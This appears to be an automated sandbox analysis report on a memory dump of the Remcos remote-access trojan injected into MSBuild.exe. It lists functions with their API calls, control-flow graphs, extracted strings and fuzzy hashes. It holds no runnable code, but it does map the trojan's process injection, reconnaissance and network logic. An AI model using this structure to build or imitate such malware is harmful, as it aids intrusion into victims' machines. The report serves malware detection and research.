                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                                                            • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                            • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                            Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3525466593-0
                                                                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                            Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                            Strings
                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                                                            • Opcode ID: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                            • Opcode Fuzzy Hash: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                            Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1815803762-0
                                                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                            Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Name$ComputerUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4229901323-0
                                                                                                                                            • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                            • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                            Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                            • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                            Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: recv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                            Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 80 40d9a5-40d9ac call 40bed7 69->80 81 40d96d-40d98c call 401e8f call 4124b7 69->81 70->69 101 40e134-40e154 call 401e8f call 412902 call 4112b5 70->101 89 40d9b5-40d9bc 80->89 90 40d9ae-40d9b0 80->90 81->80 97 40d98e-40d9a4 call 401e8f call 412902 81->97 94 40d9c0-40d9cc call 41a463 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 97->80 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 139 40da0b-40da11 138->139 139->108 141 40da13 call 4064d0 139->141 141->108 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->222 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 177 40dbc0-40dbe4 call 4022f8 call 4338c8 169->177 170->177 198 40dbf3 177->198 199 40dbe6-40dbf1 call 436050 177->199 191->163 204 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 259 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 204->259 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 259->222 272 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 259->272 272->222 292 40dc93 272->292 275 40dd81 273->275 276 40dd7d-40dd7f 273->276 278 40dd60-40dd77 call 41beb0 CreateThread 274->278 279 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->279 276->278 278->279 330 40dea1 279->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->344 354 40df6c-40df7f call 401d64 call 401e8f 343->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->355 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 390 40e004-40e00b 389->390 391 40dff8-40e002 CreateThread 389->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->101 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                            • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-QM0FWK$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                            • API String ID: 2830904901-3918134458
                                                                                                                                            • Opcode ID: f77ba8efe1220cbbf4275539dc4f663c6c9e11553760db3633d304cd3e64821f
                                                                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                            • Opcode Fuzzy Hash: f77ba8efe1220cbbf4275539dc4f663c6c9e11553760db3633d304cd3e64821f
                                                                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                                                            Function 00413FD4 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 813sleepnetworkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 494 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 629 414b54-414b66 call 4047eb call 4020b4 606->629 612 4142ca-4142df call 404915 call 40428c 607->612 613 41429f-4142c5 call 401f66 * 2 call 41a686 607->613 628 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 612->628 612->629 613->629 694 414434-414441 call 40541d 628->694 695 414446-41446d call 401e8f call 412513 628->695 643 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 629->643 644 414b8e-414b96 call 401d8c 629->644 643->644 644->523 694->695 701 414474-4145a8 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 695->701 702 41446f-414471 695->702 737 4145ad-414ac7 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 701->737 702->701 948 414ac9-414ad0 737->948 949 414adb-414ae2 737->949 948->949 950 414ad2-414ad4 948->950 951 414ae4-414ae9 call 40a767 949->951 952 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 949->952 950->949 951->952 963 414b22-414b2e CreateThread 952->963 964 414b34-414b4f call 401eea * 2 call 401e13 952->964 963->964 964->629
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-QM0FWK$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                                            • API String ID: 524882891-3547732219
                                                                                                                                            • Opcode ID: a2137af44fb69178eb9df1ce90f086248dcc72ef45f395939ae5dfdeb95f1cae
                                                                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                                                            • Opcode Fuzzy Hash: a2137af44fb69178eb9df1ce90f086248dcc72ef45f395939ae5dfdeb95f1cae
                                                                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                                                                            Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
